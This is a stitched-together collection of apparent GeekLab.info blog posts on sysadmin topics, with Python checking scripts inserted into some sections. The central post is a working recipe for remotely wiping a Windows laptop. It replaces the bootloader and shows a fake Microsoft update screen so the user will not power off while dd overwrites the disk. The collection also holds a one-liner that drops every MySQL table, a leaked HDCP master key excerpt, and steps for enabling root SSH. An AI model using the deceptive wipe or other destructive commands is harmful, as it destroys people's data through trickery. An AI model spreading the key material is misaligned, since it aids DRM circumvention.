Drop all mysql tables

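To drop all MySQL tables from the command line, use the following command. Note that there is no space between -p and the password; with a space, the client prompts for a password and treats the following word as a database name:

mysqldump -u [username] -p[password] --add-drop-table --no-data [databasename] | grep ^DROP | mysql -u [username] -p[password] [databasename]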

© GeekLabInfo Drop all mysql tables is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info


Remote wipe for Windows clients

I've recently had this situation where an employee was fired, and then refused to return 'his' laptop to the company. I cannot break into his home to return the hardware. But at least, I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.

How to do a remote wipe of a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Don't ever do vandalism, just use this to protect your data from thieves.

Prebuilt software

Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping this in the c:\ of your computer will wipe the harddisk.

Social solution for technical limitations

The boot sector of a hard drive is overwritten in a jiffy, but it can easily be restored with special tools. If you overwrite the whole hard disk, the data cannot be restored, but overwriting takes a lot of time.
If you're telling the thief "hey, I'm now overwriting the harddisk", he'll probably switch it off. So we need to scare the thief into not turning off the computer. I did this by printing a text "microsoft update being installed" and saying that the user should absolutely not switch off the computer.

Requirements

To build the software for a remote wipe, you need:

  • Administrator access to the stolen laptop
  • A virtual machine (like VMWare) to test it. An identical laptop would even be better, 'cause it has the exact same drivers.

Step 1. Build grub bootloader

You can build your own bootloader or use my grldr. Compiling on my x86_64 didn't work, use a 32 bit system (or fix the libs yourself)!

mkdir /tmp/bootloader
cd /tmp/bootloader
wget http://download.gna.org/grub4dos/grub4dos-0.4.4-src.zip
unzip grub4dos-0.4.4-src.zip
cd grub4dos-0.4.4
chmod +x configure build
vim stage2/boot.c
# edit lines 298 and 960 to scare the laptop thief into not switching off the computer
make

In grub4dos-temp/grub4dos-0.4.4/ you'll find a file grldr. This is the grub bootloader. Copy it to the c:\ of the computer you want to wipe.

Step 2. Get yourself a linux kernel

I simply used the running CentOS kernel of my development machine, named /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to the c:\ of the "victim".

Step 3. Make an initrd

With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. That's why we put all tools in an initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, which is /boot/initrd-2.6.18-194.26.1.el5.img

mkdir /tmp/initrd
cd /tmp/initrd
cat /boot/initrd-2.6.18-194.26.1.el5.img | gzip -d | cpio -id
cd bin
#Download a statically linked "dd" executable. (Or build it yourself)
wget https://www.geeklab.info/wp-content/uploads/2010/12/dd.zip
unzip dd.zip && rm dd.zip
cd ..

Now edit the file "init" to load all required drivers, make /dev nodes and finally wipe the system. My init file contains:

#!/bin/nash
echo
echo
# here I have 40 more echo's, like a "tput clear" without having the tput command
echo
echo
echo "Microsoft(TM) Windows(TM) is applying updates."
echo
echo
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
sleep 1
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
sleep 1
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
echo ""
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mkdir /dev/pts
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mkdir /dev/shm
mkdir /dev/mapper
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
hotplug
mkblkdevs
insmod /lib/scsi_mod.ko
insmod /lib/libata.ko
#insmod /lib/sata_via.ko #or other drivers
mkblkdevs
dd if=/dev/zero of=/dev/?da #either sda or hda

Warning: You may need drivers to access the harddisk, for instance ahci.ko. Check the "victims" chipset and load the correct drivers.
Finally, merge the files to 1 initrd file: find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz and copy it to c:\ of the "victim".

Step 4: menu.lst

Create a file named menu.lst and place it in c:\

default 0
timeout 0
title Installing update
kernel (hd0,0)/bzImage quiet
initrd (hd0,0)/initrd.gz

Step 5: boot.ini

The hidden system file c:\boot.ini contains information for the ntldr bootloader windows uses. Remove the system and hidden attributes. Then edit boot.ini to contain the following information:

[boot loader]
timeout=0
default=c:\grldr
[operating systems]
c:\grldr="MSWIN Updater service"

Step 6: Check

The c:\ of the "victim" now contains:
c:\grldr
c:\menu.lst
c:\bzImage
c:\initrd.gz
c:\boot.ini
Check that all files exist.

Step 7: Reboot

With psshutdown (part of Microsoft's PsTools), reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer; he may not reboot it but suspend it instead.


Enabling root SSH login on an ESX host

Starting with ESX 3.0, the ESX Server by default no longer allows root login over ssh. How to 'fix' this?

Warning: SSH root access isn't disabled just to annoy you :P It's there to protect you. Before enabling SSH root access, make sure that nobody you don't trust can connect to the SSH server.

  • Login on the console of the esx host
  • Press alt+f1 to get a login screen
  • Login as root
  • Type: sed -i "s/PermitRootLogin.*/PermitRootLogin yes/g" /etc/ssh/sshd_config
  • Type: service sshd restart
  • Logout and get yourself a cup of coffee.
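
As an added check (not part of the original post), this Python example models the sed substitution above on constructed sshd_config text and reports the value sshd would actually use, since sshd takes the first uncommented occurrence of a keyword. The sample configs and function names are assumptions of this example.

```python
import re

# Constructed sshd_config fragments, not taken from a real ESX host.
ACTIVE = "Protocol 2\nPermitRootLogin no\n"
COMMENTED_ONLY = "Protocol 2\n#PermitRootLogin no\n"

def apply_page_sed(text):
    """Same effect as: sed 's/PermitRootLogin.*/PermitRootLogin yes/g'."""
    return re.sub(r"PermitRootLogin.*", "PermitRootLogin yes", text)

def effective_root_login(text):
    """Return the global PermitRootLogin value, or None if it is not set.

    Comments and blank lines are skipped, keywords are case-insensitive,
    the first value wins, and parsing stops at the first Match block
    because settings below it are conditional.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        if key == "permitrootlogin" and len(parts) == 2:
            return parts[1].strip().strip('"').lower()
    return None

def audit(text):
    """Return (value before the edit, value after the edit)."""
    return effective_root_login(text), effective_root_login(apply_page_sed(text))

if __name__ == "__main__":
    print("active line:   ", audit(ACTIVE))
    print("commented only:", audit(COMMENTED_ONLY))
```

When the keyword exists only as a comment, the substitution rewrites the comment and the daemon keeps its built-in default, so check the result after the edit instead of assuming it took effect.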

Blocking .wwf attachments

Some idiotic German 'invented' a way to 'save trees': converting your attachments to .wwf format, a special .pdf format that blocks printing. While this may be a great feature to block printing of contracts etcetera if you're running a malicious company, most people simply don't want this.

So the big question is: How do I block .wwf files?

Postfix

In /etc/postfix/main.cf, uncomment or add the following line:
header_checks = pcre:/etc/postfix/header_checks

Then edit /etc/postfix/header_checks and add the following line:
/Content-Disposition: .*\.wwf"/ REJECT Please don't send .wwf files.
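
To see which attachment headers the rule above catches, this added example (not part of the original post) runs it against constructed MIME headers using Python's re module with the i and s flags that Postfix pcre tables enable by default. BROAD_RULE, the sample headers and the function names are assumptions of this example; Python's regex engine stands in for PCRE here.

```python
import re

# The rule from the post, as written between the slashes in header_checks.
PAGE_RULE = r'Content-Disposition: .*\.wwf"'

# Broader rule (an assumption of this example, not from the post): also covers
# Content-Type name=, unquoted values and RFC 2231 "filename*=" parameters.
BROAD_RULE = (r'^Content-(?:Disposition|Type):.*(?:file)?name\*?='
              r'\s*"?[^";]*\.wwf(?:"|;|\s|$)')

# Constructed MIME part headers; a folded header is one logical header.
SAMPLES = {
    "quoted":     'Content-Disposition: attachment; filename="report.wwf"',
    "folded":     'Content-Disposition: attachment;\n\tfilename="Report.WWF"',
    "unquoted":   'Content-Disposition: attachment; filename=report.wwf',
    "rfc2231":    "Content-Disposition: attachment; filename*=UTF-8''report.wwf",
    "type_name":  'Content-Type: application/pdf; name="report.wwf"',
    "benign_pdf": 'Content-Disposition: attachment; filename="report.pdf"',
    "benign_txt": 'Content-Disposition: attachment; filename="notes.wwf.txt"',
}

def postfix_pcre(pattern):
    """Compile with the pcre_table defaults: case-insensitive, dot matches newline."""
    return re.compile(pattern, re.IGNORECASE | re.DOTALL)

def rejected(pattern, samples=SAMPLES):
    """Return the sorted names of the sample headers the rule would REJECT."""
    rx = postfix_pcre(pattern)
    return sorted(name for name, header in samples.items() if rx.search(header))

def missed(pattern, samples=SAMPLES):
    """Return .wwf samples (non-benign names) that the rule lets through."""
    hit = set(rejected(pattern, samples))
    return sorted(n for n in samples if not n.startswith("benign") and n not in hit)

if __name__ == "__main__":
    for label, rule in (("page rule", PAGE_RULE), ("broad rule", BROAD_RULE)):
        print(label, "rejects:", rejected(rule), "misses:", missed(rule))
```

The rule from the post depends on the closing quote after .wwf, so it passes unquoted and RFC 2231 encoded filenames as well as files named only in Content-Type.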

Exchange

Attachment blocking in Exchange is usually performed by a virus scanner or spam filter. You could use, for example, Trend Micro or GFI to block .wwf files.

Sendmail

Depending on your setup, you could use amavisd-new, mailscanner or procmail to block out .wwf files.

qmail

To block attachments with qmail, you'll need Simscan. Simscan is a simple program that enables the qmail smtpd service to reject viruses, spam, and block attachments during the SMTP conversation so the processing load on the email system is kept to a minimum. The project is open source and uses other open source components. Small, very efficient and written in C.


HDCP is dead

And you know why? Because this is the master key:


HDCP MASTER KEY (MIRROR THIS TEXT!)

This is a forty times forty element matrix of fifty-six bit hexadecimal numbers.

To generate a source key, take a forty-bit number that (in binary) consists of twenty ones and twenty zeroes; this is the source KSV.  Add together those twenty rows of the matrix that correspond to the ones in the KSV (with the lowest bit in the KSV corresponding to the first row), taking all elements modulo two to the power of fifty-six; this is the source private key.

To generate a sink key, do the same, but with the transposed matrix.
    
    6692d179032205 b4116a96425a7f ecc2ef51af1740 959d3b6d07bce4 fa9f2af29814d9

    82592e77a204a8 146a6970e3c4a1 f43a81dc36eff7 568b44f60c79f5 bb606d7fe87dd6

    1b91b9b73c68f9 f31c6aeef81de6 9a9cc14469a037 a480bc978970a6 997f729d0a1a39

Google Talk on Fedora 13

For a few days now, Google has had this great feature that allows you to dial land lines from your Gmail account. Unfortunately, they are only shipping a Linux client for Debian/Ubuntu. I'm using a custom repository with a lot of custom-built RPMs, and I really don't feel like switching away from RedHat-style for servers and clients.

How to use the .deb file on Fedora?

  • First, go to gmail and click on the "call" icon in the left sidebar
  • Download the .deb file offered. I use x86_64, so I get the file google-talkplugin_current_amd64.deb
  • Start a shell
  • mv [filename] /tmp
  • mkdir /tmp/googletalk
  • cd /tmp/googletalk
  • now, extract the file: ar vx ../google-talkplugin_current_amd64.deb
  • you get 3 files, control.tar.gz data.tar.gz and debian-binary
  • extract data.tar.gz: tar zxvf data.tar.gz
  • I don't want the google crontab, which of course is debian-based, so I only copy relevant files: cp -R opt usr /

Now, on a Debian-based system, we would be ready. But on Fedora, some lib versions are incorrect. Link to the correct files (note that this makes the plugin load an OpenSSL version it was not built against):

  • cd /lib
  • ln -s libssl.so.1.0.0a libssl.so.0.9.8
  • ln -s libcrypto.so.1.0.0a libcrypto.so.0.9.8

Restart Firefox. Now you're done.
